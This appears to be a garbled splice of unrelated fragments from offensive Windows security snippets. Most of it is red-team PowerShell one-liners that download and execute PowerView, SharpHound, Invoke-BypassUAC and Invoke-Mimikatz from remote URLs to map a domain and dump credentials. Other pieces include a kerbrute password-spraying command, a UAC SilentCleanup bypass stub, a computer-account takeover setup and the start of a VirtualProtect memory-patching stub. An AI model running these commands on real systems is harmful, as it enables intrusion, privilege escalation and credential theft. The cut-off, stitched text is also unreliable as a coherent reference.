- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| # Portable HTTP file server | |
| # Should be somewhat safe but please don't actually use it. | |
| # You can't exit this with CTRL+C directly; use the shutdown command shown below a directory listing, | |
| # or kill the PowerShell process, which sometimes leaves the port in use afterwards. | |
| # Features | |
| # - Directory Browser | |
| # - Can handle UTF8 URLs | |
| # - Delivers unknown file types | |
| # - Path traversal (/../) attack prevention |
| function UAC-SilentCleanupBypass { | |
| param( | |
| [Parameter(Mandatory = $True)] | |
| [String]$Command | |
| ) | |
| $assemblies=( | |
| "System" | |
| ) |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
| # Domain Recon | |
| ## ShareFinder - Look for shares on the network, check access under the current user context, and log the results to a file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] | |
| public static extern IntPtr LoadLibrary(string name); | |
| [DllImport("kernel32")] | |
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); |